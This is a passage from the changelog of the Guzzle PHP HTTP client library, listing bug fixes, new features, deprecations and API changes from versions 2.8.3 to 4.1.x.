user. This prevents the adapter layer from modifying the request that is sent over the wire after any listeners may have already put the request in a desired state (e.g., signed the request). * Throwing an exception when you attempt to send requests that have the "stream" set to true in parallel using the MultiAdapter. * Only calling curl_multi_select when there are active cURL handles. This was previously changed and caused performance problems on some systems due to PHP always selecting until the maximum select timeout. * Fixed a bug where multipart/form-data POST fields were not correctly aggregated (e.g., values with "&"). ## 4.1.6 - 2014-08-03 * Added helper methods to make it easier to represent messages as strings, including getting the start line and getting headers as a string. ## 4.1.5 - 2014-08-02 * Automatically retrying cURL "Connection died, retrying a fresh connect" errors when possible. * cURL implementation cleanup * Allowing multiple event subscriber listeners to be registered per event by passing an array of arrays of listener configuration. ## 4.1.4 - 2014-07-22 * Fixed a bug that caused multi-part POST requests with more than one field to serialize incorrectly. * Paths can now be set to "0" * `ResponseInterface::xml` now accepts a `libxml_options` option and added a missing default argument that was required when parsing XML response bodies. * A `save_to` stream is now created lazily, which means that files are not created on disk unless a request succeeds. ## 4.1.3 - 2014-07-15 * Various fixes to multipart/form-data POST uploads * Wrapping function.php in an if-statement to ensure Guzzle can be used globally and in a Composer install * Fixed an issue with generating and merging in events to an event array * POST headers are only applied before sending a request to allow you to change the query aggregator used before uploading * Added much more robust query string parsing * Fixed various parsing and normalization issues with URLs * Fixing an issue where multi-valued headers were not being utilized correctly in the StreamAdapter ## 4.1.2 - 2014-06-18 * Added support for sending payloads with GET requests ## 4.1.1 - 2014-06-08 * Fixed an issue related to using custom message factory options in subclasses * Fixed an issue with nested form fields in a multi-part POST * Fixed an issue with using the `json` request option for POST requests * Added `ToArrayInterface` to `GuzzleHttp\Cookie\CookieJar` ## 4.1.0 - 2014-05-27 * Added a `json` request option to easily serialize JSON payloads. * Added a `GuzzleHttp\json_decode()` wrapper to safely parse JSON. * Added `setPort()` and `getPort()` to `GuzzleHttp\Message\RequestInterface`. * Added the ability to provide an emitter to a client in the client constructor. * Added the ability to persist a cookie session using $_SESSION. * Added a trait that can be used to add event listeners to an iterator. * Removed request method constants from RequestInterface. * Fixed warning when invalid request start-lines are received. * Updated MessageFactory to work with custom request option methods. * Updated cacert bundle to latest build. 4.0.2 (2014-04-16) ------------------ * Proxy requests using the StreamAdapter now properly use request_fulluri (#632) * Added the ability to set scalars as POST fields (#628) ## 4.0.1 - 2014-04-04 * The HTTP status code of a response is now set as the exception code of RequestException objects. * 303 redirects will now correctly switch from POST to GET requests. * The default parallel adapter of a client now correctly uses the MultiAdapter. * HasDataTrait now initializes the internal data array as an empty array so that the toArray() method always returns an array. ## 4.0.0 - 2014-03-29 * For information on changes and upgrading, see: https://github.com/guzzle/guzzle/blob/master/UPGRADING.md#3x-to-40 * Added `GuzzleHttp\batch()` as a convenience function for sending requests in parallel without needing to write asynchronous code. * Restructured how events are added to `GuzzleHttp\ClientInterface::sendAll()`. You can now pass a callable or an array of associative arrays where each associative array contains the "fn", "priority", and "once" keys. ## 4.0.0.rc-2 - 2014-03-25 * Removed `getConfig()` and `setConfig()` from clients to avoid confusion around whether things like base_url, message_factory, etc. should be able to be retrieved or modified. * Added `getDefaultOption()` and `setDefaultOption()` to ClientInterface * functions.php functions were renamed using snake_case to match PHP idioms * Added support for `HTTP_PROXY`, `HTTPS_PROXY`, and `GUZZLE_CURL_SELECT_TIMEOUT` environment variables * Added the ability to specify custom `sendAll()` event priorities * Added the ability to specify custom stream context options to the stream adapter. * Added a functions.php function for `get_path()` and `set_path()` * CurlAdapter and MultiAdapter now use a callable to generate curl resources * MockAdapter now properly reads a body and emits a `headers` event * Updated Url class to check if a scheme and host are set before adding ":" and "//". This allows empty Url (e.g., "") to be serialized as "". * Parsing invalid XML no longer emits warnings * Curl classes now properly throw AdapterExceptions * Various performance optimizations * Streams are created with the faster `Stream\create()` function * Marked deprecation_proxy() as internal * Test server is now a collection of static methods on a class ## 4.0.0-rc.1 - 2014-03-15 * See https://github.com/guzzle/guzzle/blob/master/UPGRADING.md#3x-to-40 ## 3.8.1 - 2014-01-28 * Bug: Always using GET requests when redirecting from a 303 response * Bug: CURLOPT_SSL_VERIFYHOST is now correctly set to false when setting `$certificateAuthority` to false in `Guzzle\Http\ClientInterface::setSslVerification()` * Bug: RedirectPlugin now uses strict RFC 3986 compliance when combining a base URL with a relative URL * Bug: The body of a request can now be set to `"0"` * Sending PHP stream requests no longer forces `HTTP/1.0` * Adding more information to ExceptionCollection exceptions so that users have more context, including a stack trace of each sub-exception * Updated the `$ref` attribute in service descriptions to merge over any existing parameters of a schema (rather than clobbering everything). * Merging URLs will now use the query string object from the relative URL (thus allowing custom query aggregators) * Query strings are now parsed in a way that they do no convert empty keys with no value to have a dangling `=`. For example `foo&bar=baz` is now correctly parsed and recognized as `foo&bar=baz` rather than `foo=&bar=baz`. * Now properly escaping the regular expression delimiter when matching Cookie domains. * Network access is now disabled when loading XML documents ## 3.8.0 - 2013-12-05 * Added the ability to define a POST name for a file * JSON response parsing now properly walks additionalProperties * cURL error code 18 is now retried automatically in the BackoffPlugin * Fixed a cURL error when URLs contain fragments * Fixed an issue in the BackoffPlugin retry event where it was trying to access all exceptions as if they were CurlExceptions * CURLOPT_PROGRESS function fix for PHP 5.5 (69fcc1e) * Added the ability for Guzzle to work with older versions of cURL that do not support `CURLOPT_TIMEOUT_MS` * Fixed a bug that was encountered when parsing empty header parameters * UriTemplate now has a `setRegex()` method to match the docs * The `debug` request parameter now checks if it is truthy rather than if it exists * Setting the `debug` request parameter to true shows verbose cURL output instead of using the LogPlugin * Added the ability to combine URLs using strict RFC 3986 compliance * Command objects can now return the validation errors encountered by the command * Various fixes to cache revalidation (#437 and 29797e5) * Various fixes to the AsyncPlugin * Cleaned up build scripts ## 3.7.4 - 2013-10-02 * Bug fix: 0 is now an allowed value in a description parameter that has a default value (#430) * Bug fix: SchemaFormatter now returns an integer when formatting to a Unix timestamp (see https://github.com/aws/aws-sdk-php/issues/147) * Bug fix: Cleaned up and fixed URL dot segment removal to properly resolve internal dots * Minimum PHP version is now properly specified as 5.3.3 (up from 5.3.2) (#420) * Updated the bundled cacert.pem (#419) * OauthPlugin now supports adding authentication to headers or query string (#425) ## 3.7.3 - 2013-09-08 * Added the ability to get the exception associated with a request/command when using `MultiTransferException` and `CommandTransferException`. * Setting `additionalParameters` of a response to false is now honored when parsing responses with a service description * Schemas are only injected into response models when explicitly configured. * No longer guessing Content-Type based on the path of a request. Content-Type is now only guessed based on the path of an EntityBody. * Bug fix: ChunkedIterator can now properly chunk a \Traversable as well as an \Iterator. * Bug fix: FilterIterator now relies on `\Iterator` instead of `\Traversable`. * Bug fix: Gracefully handling malformed responses in RequestMediator::writeResponseBody() * Bug fix: Replaced call to canCache with canCacheRequest in the CallbackCanCacheStrategy of the CachePlugin * Bug fix: Visiting XML attributes first before visiting XML children when serializing requests * Bug fix: Properly parsing headers that contain commas contained in quotes * Bug fix: mimetype guessing based on a filename is now case-insensitive ## 3.7.2 - 2013-08-02 * Bug fix: Properly URL encoding paths when using the PHP-only version of the UriTemplate expander See https://github.com/guzzle/guzzle/issues/371 * Bug fix: Cookie domains are now matched correctly according to RFC 6265 See https://github.com/guzzle/guzzle/issues/377 * Bug fix: GET parameters are now used when calculating an OAuth signature * Bug fix: Fixed an issue with cache revalidation where the If-None-Match header was being double quoted * `Guzzle\Common\AbstractHasDispatcher::dispatch()` now returns the event that was dispatched * `Guzzle\Http\QueryString::factory()` now guesses the most appropriate query aggregator to used based on the input. See https://github.com/guzzle/guzzle/issues/379 * Added a way to add custom domain objects to service description parsing using the `operation.parse_class` event. See https://github.com/guzzle/guzzle/pull/380 * cURL multi cleanup and optimizations ## 3.7.1 - 2013-07-05 * Bug fix: Setting default options on a client now works * Bug fix: Setting options on HEAD requests now works. See #352 * Bug fix: Moving stream factory before send event to before building the stream. See #353 * Bug fix: Cookies no longer match on IP addresses per RFC 6265 * Bug fix: Correctly parsing header parameters that are in `<>` and quotes * Added `cert` and `ssl_key` as request options * `Host` header can now diverge from the host part of a URL if the header is set manually * `Guzzle\Service\Command\LocationVisitor\Request\XmlVisitor` was rewritten to change from using SimpleXML to XMLWriter * OAuth parameters are only added via the plugin if they aren't already set * Exceptions are now thrown when a URL cannot be parsed * Returning `false` if `Guzzle\Http\EntityBody::getContentMd5()` fails * Not setting a `Content-MD5` on a command if calculating the Content-MD5 fails via the CommandContentMd5Plugin ## 3.7.0 - 2013-06-10 * See UPGRADING.md for more information on how to upgrade. * Requests now support the ability to specify an array of $options when creating a request to more easily modify a request. You can pass a 'request.options' configuration setting to a client to apply default request options to every request created by a client (e.g. default query string variables, headers, curl options, etc.). * Added a static facade class that allows you to use Guzzle with static methods and mount the class to `\Guzzle`. See `Guzzle\Http\StaticClient::mount`. * Added `command.request_options` to `Guzzle\Service\Command\AbstractCommand` to pass request options to requests created by a command (e.g. custom headers, query string variables, timeout settings, etc.). * Stream size in `Guzzle\Stream\PhpStreamRequestFactory` will now be set if Content-Length is returned in the headers of a response * Added `Guzzle\Common\Collection::setPath($path, $value)` to set a value into an array using a nested key (e.g. `$collection->setPath('foo/baz/bar', 'test'); echo $collection['foo']['bar']['bar'];`) * ServiceBuilders now support storing and retrieving arbitrary data * CachePlugin can now purge all resources for a given URI * CachePlugin can automatically purge matching cached items when a non-idempotent request is sent to a resource * CachePlugin now uses the Vary header to determine if a resource is a cache hit * `Guzzle\Http\Message\Response` now implements `\Serializable` * Added `Guzzle\Cache\CacheAdapterFactory::fromCache()` to more easily create cache adapters * `Guzzle\Service\ClientInterface::execute()` now accepts an array, single command, or Traversable * Fixed a bug in `Guzzle\Http\Message\Header\Link::addLink()` * Better handling of calculating the size of a stream in `Guzzle\Stream\Stream` using fstat() and caching the size * `Guzzle\Common\Exception\ExceptionCollection` now creates a more readable exception message * Fixing BC break: Added back the MonologLogAdapter implementation rather than extending from PsrLog so that older Symfony users can still use the old version of Monolog. * Fixing BC break: Added the implementation back in for `Guzzle\Http\Message\AbstractMessage::getTokenizedHeader()`. Now triggering an E_USER_DEPRECATED warning when used. Use `$message->getHeader()->parseParams()`. * Several performance improvements to `Guzzle\Common\Collection` * Added an `$options` argument to the end of the following methods of `Guzzle\Http\ClientInterface`: createRequest, head, delete, put, patch, post, options, prepareRequest * Added an `$options` argument to the end of `Guzzle\Http\Message\Request\RequestFactoryInterface::createRequest()` * Added an `applyOptions()` method to `Guzzle\Http\Message\Request\RequestFactoryInterface` * Changed `Guzzle\Http\ClientInterface::get($uri = null, $headers = null, $body = null)` to `Guzzle\Http\ClientInterface::get($uri = null, $headers = null, $options = array())`. You can still pass in a resource, string, or EntityBody into the $options parameter to specify the download location of the response. * Changed `Guzzle\Common\Collection::__construct($data)` to no longer accepts a null value for `$data` but a default `array()` * Added `Guzzle\Stream\StreamInterface::isRepeatable` * Removed `Guzzle\Http\ClientInterface::setDefaultHeaders(). Use $client->getConfig()->setPath('request.options/headers/{header_name}', 'value')`. or $client->getConfig()->setPath('request.options/headers', array('header_name' => 'value'))`. * Removed `Guzzle\Http\ClientInterface::getDefaultHeaders(). Use $client->getConfig()->getPath('request.options/headers')`. * Removed `Guzzle\Http\ClientInterface::expandTemplate()` * Removed `Guzzle\Http\ClientInterface::setRequestFactory()` * Removed `Guzzle\Http\ClientInterface::getCurlMulti()` * Removed `Guzzle\Http\Message\RequestInterface::canCache` * Removed `Guzzle\Http\Message\RequestInterface::setIsRedirect` * Removed `Guzzle\Http\Message\RequestInterface::isRedirect` * Made `Guzzle\Http\Client::expandTemplate` and `getUriTemplate` protected methods. * You can now enable E_USER_DEPRECATED warnings to see if you are using a deprecated method by setting `Guzzle\Common\Version::$emitWarnings` to true. * Marked `Guzzle\Http\Message\Request::isResponseBodyRepeatable()` as deprecated. Use `$request->getResponseBody()->isRepeatable()` instead. * Marked `Guzzle\Http\Message\Request::canCache()` as deprecated. Use `Guzzle\Plugin\Cache\DefaultCanCacheStrategy->canCacheRequest()` instead. * Marked `Guzzle\Http\Message\Request::canCache()` as deprecated. Use `Guzzle\Plugin\Cache\DefaultCanCacheStrategy->canCacheRequest()` instead. * Marked `Guzzle\Http\Message\Request::setIsRedirect()` as deprecated. Use the HistoryPlugin instead. * Marked `Guzzle\Http\Message\Request::isRedirect()` as deprecated. Use the HistoryPlugin instead. * Marked `Guzzle\Cache\CacheAdapterFactory::factory()` as deprecated * Marked 'command.headers', 'command.response_body' and 'command.on_complete' as deprecated for AbstractCommand. These will work through Guzzle 4.0 * Marked 'request.params' for `Guzzle\Http\Client` as deprecated. Use [request.options][params]. * Marked `Guzzle\Service\Client::enableMagicMethods()` as deprecated. Magic methods can no longer be disabled on a Guzzle\Service\Client. * Marked `Guzzle\Service\Client::getDefaultHeaders()` as deprecated. Use $client->getConfig()->getPath('request.options/headers')`. * Marked `Guzzle\Service\Client::setDefaultHeaders()` as deprecated. Use $client->getConfig()->setPath('request.options/headers/{header_name}', 'value')`. * Marked `Guzzle\Parser\Url\UrlParser` as deprecated. Just use PHP's `parse_url()` and percent encode your UTF-8. * Marked `Guzzle\Common\Collection::inject()` as deprecated. * Marked `Guzzle\Plugin\CurlAuth\CurlAuthPlugin` as deprecated. Use `$client->getConfig()->setPath('request.options/auth', array('user', 'pass', 'Basic|Digest');` * CacheKeyProviderInterface and DefaultCacheKeyProvider are no longer used. All of this logic is handled in a CacheStorageInterface. These two objects and interface will be removed in a future version. * Always setting X-cache headers on cached responses * Default cache TTLs are now handled by the CacheStorageInterface of a CachePlugin * `CacheStorageInterface::cache($key, Response $response, $ttl = null)` has changed to `cache(RequestInterface $request, Response $response);` * `CacheStorageInterface::fetch($key)` has changed to `fetch(RequestInterface $request);` * `CacheStorageInterface::delete($key)` has changed to `delete(RequestInterface $request);` * Added `CacheStorageInterface::purge($url)` * `DefaultRevalidation::__construct(CacheKeyProviderInterface $cacheKey, CacheStorageInterface $cache, CachePlugin $plugin)` has changed to `DefaultRevalidation::__construct(CacheStorageInterface $cache, CanCacheStrategyInterface $canCache = null)` * Added `RevalidationInterface::shouldRevalidate(RequestInterface $request, Response $response)` ## 3.6.0 - 2013-05-29 * ServiceDescription now implements ToArrayInterface * Added command.hidden_params to blacklist certain headers from being treated as additionalParameters * Guzzle can now correctly parse incomplete URLs * Mixed casing of headers are now forced to be a single consistent casing across all values for that header. * Messages internally use a HeaderCollection object to delegate handling case-insensitive header resolution * Removed the whole changedHeader() function system of messages because all header changes now go through addHeader(). * Specific header implementations can be created for complex headers. When a message creates a header, it uses a HeaderFactory which can map specific headers to specific header classes. There is now a Link header and CacheControl header implementation. * Removed from interface: Guzzle\Http\ClientInterface::setUriTemplate * Removed from interface: Guzzle\Http\ClientInterface::setCurlMulti() * Removed Guzzle\Http\Message\Request::receivedRequestHeader() and implemented this functionality in Guzzle\Http\Curl\RequestMediator * Removed the optional $asString parameter from MessageInterface::getHeader(). Just cast the header to a string. * Removed the optional $tryChunkedTransfer option from Guzzle\Http\Message\EntityEnclosingRequestInterface * Removed the $asObjects argument from Guzzle\Http\Message\MessageInterface::getHeaders() * Removed Guzzle\Parser\ParserRegister::get(). Use getParser() * Removed Guzzle\Parser\ParserRegister::set(). Use registerParser(). * All response header helper functions return a string rather than mixing Header objects and strings inconsistently * Removed cURL blacklist support. This is no longer necessary now that Expect, Accept, etc. are managed by Guzzle directly via interfaces * Removed the injecting of a request object onto a response object. The methods to get and set a request still exist but are a no-op until removed. * Most classes that used to require a `Guzzle\Service\Command\CommandInterface` typehint now request a `Guzzle\Service\Command\ArrayCommandInterface`. * Added `Guzzle\Http\Message\RequestInterface::startResponse()` to the RequestInterface to handle injecting a response on a request while the request is still being transferred * The ability to case-insensitively search for header values * Guzzle\Http\Message\Header::hasExactHeader * Guzzle\Http\Message\Header::raw. Use getAll() * Deprecated cache control specific methods on Guzzle\Http\Message\AbstractMessage. Use the CacheControl header object instead. * `Guzzle\Service\Command\CommandInterface` now extends from ToArrayInterface and ArrayAccess * Added the ability to cast Model objects to a string to view debug information. ## 3.5.0 - 2013-05-13 * Bug: Fixed a regression so that request responses are parsed only once per oncomplete event rather than multiple times * Bug: Better cleanup of one-time events across the board (when an event is meant to fire once, it will now remove itself from the EventDispatcher) * Bug: `Guzzle\Log\MessageFormatter` now properly writes "total_time" and "connect_time" values * Bug: Cloning an EntityEnclosingRequest now clones the EntityBody too * Bug: Fixed an undefined index error when parsing nested JSON responses with a sentAs parameter that reference a non-existent key * Bug: All __call() method arguments are now required (helps with mocking frameworks) * Deprecating Response::getRequest() and now using a shallow clone of a request object to remove a circular reference to help with refcount based garbage collection of resources created by sending a request * Deprecating ZF1 cache and log adapters. These will be removed in the next major version. * Deprecating `Response::getPreviousResponse()` (method signature still exists, but it's deprecated). Use the HistoryPlugin for a history. * Added a `responseBody` alias for the `response_body` location * Refactored internals to no longer rely on Response::getRequest() * HistoryPlugin can now be cast to a string * HistoryPlugin now logs transactions rather than requests and responses to more accurately keep track of the requests and responses that are sent over the wire * Added `getEffectiveUrl()` and `getRedirectCount()` to Response objects ## 3.4.3 - 2013-04-30 * Bug fix: Fixing bug introduced in 3.4.2 where redirect responses are duplicated on the final redirected response * Added a check to re-extract the temp cacert bundle from the phar before sending each request ## 3.4.2 - 2013-04-29 * Bug fix: Stream objects now work correctly with "a" and "a+" modes * Bug fix: Removing `Transfer-Encoding: chunked` header when a Content-Length is present * Bug fix: AsyncPlugin no longer forces HEAD requests * Bug fix: DateTime timezones are now properly handled when using the service description schema formatter * Bug fix: CachePlugin now properly handles stale-if-error directives when a request to the origin server fails * Setting a response on a request will write to the custom request body from the response body if one is specified * LogPlugin now writes to php://output when STDERR is undefined * Added the ability to set multiple POST files for the same key in a single call * application/x-www-form-urlencoded POSTs now use the utf-8 charset by default * Added the ability to queue CurlExceptions to the MockPlugin * Cleaned up how manual responses are queued on requests (removed "queued_response" and now using request.before_send) * Configuration loading now allows remote files ## 3.4.1 - 2013-04-16 * Large refactoring to how CurlMulti handles work. There is now a proxy that sits in front of a pool of CurlMulti handles. This greatly simplifies the implementation, fixes a couple bugs, and provides a small performance boost. * Exceptions are now properly grouped when sending requests in parallel * Redirects are now properly aggregated when a multi transaction fails * Redirects now set the response on the original object even in the event of a failure * Bug fix: Model names are now properly set even when using $refs * Added support for PHP 5.5's CurlFile to prevent warnings with the deprecated @ syntax * Added support for oauth_callback in OAuth signatures * Added support for oauth_verifier in OAuth signatures * Added support to attempt to retrieve a command first literally, then ucfirst, the with inflection ## 3.4.0 - 2013-04-11 * Bug fix: URLs are now resolved correctly based on https://datatracker.ietf.org/doc/html/rfc3986#section-5.2. #289 * Bug fix: Absolute URLs with a path in a service description will now properly override the base URL. #289 * Bug fix: Parsing a query string with a single PHP array value will now result in an array. #263 * Bug fix: Better normalization of the User-Agent header to prevent duplicate headers. #264. * Bug fix: Added `number` type to service descriptions. * Bug fix: empty parameters are removed from an OAuth signature * Bug fix: Revalidating a cache entry prefers the Last-Modified over the Date header * Bug fix: Fixed "array to string" error when validating a union of types in a service description * Bug fix: Removed code that attempted to determine the size of a stream when data is written to the stream * Bug fix: Not including an `oauth_token` if the value is null in the OauthPlugin. * Bug fix: Now correctly aggregating successful requests and failed requests in CurlMulti when a redirect occurs. * The new default CURLOPT_TIMEOUT setting has been increased to 150 seconds so that Guzzle works on poor connections. * Added a feature to EntityEnclosingRequest::setBody() that will automatically set the Content-Type of the request if the Content-Type can be determined based on the entity body or the path of the request. * Added the ability to overwrite configuration settings in a client when grabbing a throwaway client from a builder. * Added support for a PSR-3 LogAdapter. * Added a `command.after_prepare` event * Added `oauth_callback` parameter to the OauthPlugin * Added the ability to create a custom stream class when using a stream factory * Added a CachingEntityBody decorator * Added support for `additionalParameters` in service descriptions to define how custom parameters are serialized. * The bundled SSL certificate is now provided in the phar file and extracted when running Guzzle from a phar. * You can now send any EntityEnclosingRequest with POST fields or POST files and cURL will handle creating bodies * POST requests using a custom entity body are now treated exactly like PUT requests but with a custom cURL method. This means that the redirect behavior of POST requests with custom bodies will not be the same as POST requests that use POST fields or files (the latter is only used when emulating a form POST in the browser). * Lots of cleanup to CurlHandle::factory and RequestFactory::createRequest ## 3.3.1 - 2013-03-10 * Added the ability to create PHP streaming responses from HTTP requests * Bug fix: Running any filters when parsing response headers with service descriptions * Bug fix: OauthPlugin fixes to allow for multi-dimensional array signing, and sorting parameters before signing * Bug fix: Removed the adding of default empty arrays and false Booleans to responses in order to be consistent across response location visitors. * Bug fix: Removed the possibility of creating configuration files with circular dependencies * RequestFactory::create() now uses the key of a POST file when setting the POST file name * Added xmlAllowEmpty to serialize an XML body even if no XML specific parameters are set ## 3.3.0 - 2013-03-03 * A large number of performance optimizations have been made * Bug fix: Added 'wb' as a valid write mode for streams * Bug fix: `Guzzle\Http\Message\Response::json()` now allows scalar values to be returned * Bug fix: Fixed bug in `Guzzle\Http\Message\Response` where wrapping quotes were stripped from `getEtag()` * BC: Removed `Guzzle\Http\Utils` class * BC: Setting a service description on a client will no longer modify the client's command factories. * BC: Emitting IO events from a RequestMediator is now a parameter that must be set in a request's curl options using the 'emit_io' key. This was previously set under a request's parameters using 'curl.emit_io' * BC: `Guzzle\Stream\Stream::getWrapper()` and `Guzzle\Stream\Stream::getSteamType()` are no longer converted to lowercase * Operation parameter objects are now lazy loaded internally * Added ErrorResponsePlugin that can throw errors for responses defined in service description operations' errorResponses * Added support for instantiating responseType=class responseClass classes. Classes must implement `Guzzle\Service\Command\ResponseClassInterface` * Added support for additionalProperties for top-level parameters in responseType=model responseClasses. These additional properties also support locations and can be used to parse JSON responses where the outermost part of the JSON is an array * Added support for nested renaming of JSON models (rename sentAs to name) * CachePlugin * Added support for stale-if-error so that the CachePlugin can now serve stale content from the cache on error * Debug headers can now added to cached response in the CachePlugin ## 3.2.0 - 2013-02-14 * CurlMulti is no longer reused globally. A new multi object is created per-client. This helps to isolate clients. * URLs with no path no longer contain a "/" by default * Guzzle\Http\QueryString does no longer manages the leading "?". This is now handled in Guzzle\Http\Url. * BadResponseException no longer includes the full request and response message * Adding setData() to Guzzle\Service\Description\ServiceDescriptionInterface * Adding getResponseBody() to Guzzle\Http\Message\RequestInterface * Various updates to classes to use ServiceDescriptionInterface type hints rather than ServiceDescription * Header values can now be normalized into distinct values when multiple headers are combined with a comma separated list * xmlEncoding can now be customized for the XML declaration of a XML service description operation * Guzzle\Http\QueryString now uses Guzzle\Http\QueryAggregator\QueryAggregatorInterface objects to add custom value aggregation and no longer uses callbacks * The URL encoding implementation of Guzzle\Http\QueryString can now be customized * Bug fix: Filters were not always invoked for array service description parameters * Bug fix: Redirects now use a target response body rather than a temporary response body * Bug fix: The default exponential backoff BackoffPlugin was not giving when the request threshold was exceeded * Bug fix: Guzzle now takes the first found value when grabbing Cache-Control directives ## 3.1.2 - 2013-01-27 * Refactored how operation responses are parsed. Visitors now include a before() method responsible for parsing the response body. For example, the XmlVisitor now parses the XML response into an array in the before() method. * Fixed an issue where cURL would not automatically decompress responses when the Accept-Encoding header was sent * CURLOPT_SSL_VERIFYHOST is never set to 1 because it is deprecated (see 5e0ff2ef20f839e19d1eeb298f90ba3598784444) * Fixed a bug where redirect responses were not chained correctly using getPreviousResponse() * Setting default headers on a client after setting the user-agent will not erase the user-agent setting ## 3.1.1 - 2013-01-20 * Adding wildcard support to Guzzle\Common\Collection::getPath() * Adding alias support to ServiceBuilder configs * Adding Guzzle\Service\Resource\CompositeResourceIteratorFactory and cleaning up factory interface ## 3.1.0 - 2013-01-12 * BC: CurlException now extends from RequestException rather than BadResponseException * BC: Renamed Guzzle\Plugin\Cache\CanCacheStrategyInterface::canCache() to canCacheRequest() and added CanCacheResponse() * Added getData to ServiceDescriptionInterface * Added context array to RequestInterface::setState() * Bug: Removing hard dependency on the BackoffPlugin from Guzzle\Http * Bug: Adding required content-type when JSON request visitor adds JSON to a command * Bug: Fixing the serialization of a service description with custom data * Made it easier to deal with exceptions thrown when transferring commands or requests in parallel by providing an array of successful and failed responses * Moved getPath from Guzzle\Service\Resource\Model to Guzzle\Common\Collection * Added Guzzle\Http\IoEmittingEntityBody * Moved command filtration from validators to location visitors * Added `extends` attributes to service description parameters * Added getModels to ServiceDescriptionInterface ## 3.0.7 - 2012-12-19 * Fixing phar detection when forcing a cacert to system if null or true * Allowing filename to be passed to `Guzzle\Http\Message\Request::setResponseBody()` * Cleaning up `Guzzle\Common\Collection::inject` method * Adding a response_body location to service descriptions ## 3.0.6 - 2012-12-09 * CurlMulti performance improvements * Adding setErrorResponses() to Operation * composer.json tweaks ## 3.0.5 - 2012-11-18 * Bug: Fixing an infinite recursion bug caused from revalidating with the CachePlugin * Bug: Response body can now be a string containing "0" * Bug: Using Guzzle inside of a phar uses system by default but now allows for a custom cacert * Bug: QueryString::fromString now properly parses query string parameters that contain equal signs * Added support for XML attributes in service description responses * DefaultRequestSerializer now supports array URI parameter values for URI template expansion * Added better mimetype guessing to requests and post files ## 3.0.4 - 2012-11-11 * Bug: Fixed a bug when adding multiple cookies to a request to use the correct glue value * Bug: Cookies can now be added that have a name, domain, or value set to "0" * Bug: Using the system cacert bundle when using the Phar * Added json and xml methods to Response to make it easier to parse JSON and XML response data into data structures * Enhanced cookie jar de-duplication * Added the ability to enable strict cookie jars that throw exceptions when invalid cookies are added * Added setStream to StreamInterface to actually make it possible to implement custom rewind behavior for entity bodies * Added the ability to create any sort of hash for a stream rather than just an MD5 hash ## 3.0.3 - 2012-11-04 * Implementing redirects in PHP rather than cURL * Added PECL URI template extension and using as default parser if available * Bug: Fixed Content-Length parsing of Response factory * Adding rewind() method to entity bodies and streams. Allows for custom rewinding of non-repeatable streams. * Adding ToArrayInterface throughout library * Fixing OauthPlugin to create unique nonce values per request ## 3.0.2 - 2012-10-25 * Magic methods are enabled by default on clients * Magic methods return the result of a command * Service clients no longer require a base_url option in the factory * Bug: Fixed an issue with URI templates where null template variables were being expanded ## 3.0.1 - 2012-10-22 * Models can now be used like regular collection objects by calling filter, map, etc. * Models no longer require a Parameter structure or initial data in the constructor * Added a custom AppendIterator to get around a PHP bug with the `\AppendIterator` ## 3.0.0 - 2012-10-15 * Rewrote service description format to be based on Swagger * Now based on JSON schema * Added nested input structures and nested response models * Support for JSON and XML input and output models * Renamed `commands` to `operations` * Removed dot class notation * Removed custom types * Broke the project into smaller top-level namespaces to be more component friendly * Removed support for XML configs and descriptions. Use arrays or JSON files. * Removed the Validation component and Inspector * Moved all cookie code to Guzzle\Plugin\Cookie * Magic methods on a Guzzle\Service\Client now return the command un-executed. * Calling getResult() or getResponse() on a command will lazily execute the command if needed. * Now shipping with cURL's CA certs and using it by default * Added previousResponse() method to response objects * No longer sending Accept and Accept-Encoding headers on every request * Only sending an Expect header by default when a payload is greater than 1MB * Added/moved client options: * curl.blacklist to curl.option.blacklist * Added ssl.certificate_authority * Added a Guzzle\Iterator component * Moved plugins from Guzzle\Http\Plugin to Guzzle\Plugin * Added a more robust backoff retry strategy (replaced the ExponentialBackoffPlugin) * Added a more robust caching plugin * Added setBody to response objects * Updating LogPlugin to use a more flexible MessageFormatter * Added a completely revamped build process * Cleaning up Collection class and removing default values from the get method * Fixed ZF2 cache adapters ## 2.8.8 - 2012-10-15 * Bug: Fixed a cookie issue that caused dot prefixed domains to not match where popular browsers did ## 2.8.7 - 2012-09-30 * Bug: Fixed config file aliases for JSON includes * Bug: Fixed cookie bug on a request object by using CookieParser to parse cookies on requests * Bug: Removing the path to a file when sending a Content-Disposition header on a POST upload * Bug: Hardening request and response parsing to account for missing parts * Bug: Fixed PEAR packaging * Bug: Fixed Request::getInfo * Bug: Fixed cases where CURLM_CALL_MULTI_PERFORM return codes were causing curl transactions to fail * Adding the ability for the namespace Iterator factory to look in multiple directories * Added more getters/setters/removers from service descriptions * Added the ability to remove POST fields from OAuth signatures * OAuth plugin now supports 2-legged OAuth ## 2.8.6 - 2012-09-05 * Added the ability to modify and build service descriptions * Added the use of visitors to apply parameters to locations in service descriptions using the dynamic command * Added a `json` parameter location * Now allowing dot notation for classes in the CacheAdapterFactory * Using the union of two arrays rather than an array_merge when extending service builder services and service params * Ensuring that a service is a string before doing strpos() checks on it when substituting services for references in service builder config files. * Services defined in two different config files that include one another will by default replace the previously defined service, but you can now create services that extend themselves and merge their settings over the previous * The JsonLoader now supports aliasing filenames with different filenames. This allows you to alias something like '_default' with a default JSON configuration file. ## 2.8.5 - 2012-08-29 * Bug: Suppressed empty arrays from URI templates * Bug: Added the missing $options argument from ServiceDescription::factory to enable caching * Added support for HTTP responses that do not contain a reason phrase in the start-line * AbstractCommand commands are now invokable * Added a way to get the data used when signing an Oauth request before a request is sent ## 2.8.4 - 2012-08-15 * Bug: Custom delay time calculations are no longer ignored in the ExponentialBackoffPlugin * Added the ability to transfer entity bodies as a string rather than streamed. This gets around curl error 65. Set `body_as_string` in a request's curl options to enable. * Added a StreamInterface, EntityBodyInterface, and added ftell() to Guzzle\Common\Stream * Added an AbstractEntityBodyDecorator and a ReadLimitEntityBody decorator to transfer only a subset of a decorated stream * Stream and EntityBody objects will now return the file position to the previous position after a read required operation (e.g. getContentMd5()) * Added additional response status codes * Removed SSL information from the default User-Agent header * DELETE requests can now send an entity body * Added an EventDispatcher to the ExponentialBackoffPlugin and added an ExponentialBackoffLogger to log backoff retries * Added the ability of the MockPlugin to consume mocked request bodies * LogPlugin now exposes request and response objects in the extras array ## 2.8.3 - 2012-07-30 * Bug: Fixed a case where empty POST requests were sent as GET requests * Bug: Fixed a bug in ExponentialBackoffPlugin that caused fatal errors when retrying an EntityEnclosingRequest that does not have a body * Bug: Setting the response body of a request to null after completing a request, not when setting the state of a request to new * Added multiple inheritance to service description commands * Added an ApiCommandInterface and added `getParamNames()` and `hasParam()` * Removed the default 2mb size cutoff from the Md5ValidatorPlugin so that it now defaults to validating everything * Changed CurlMulti::perform to 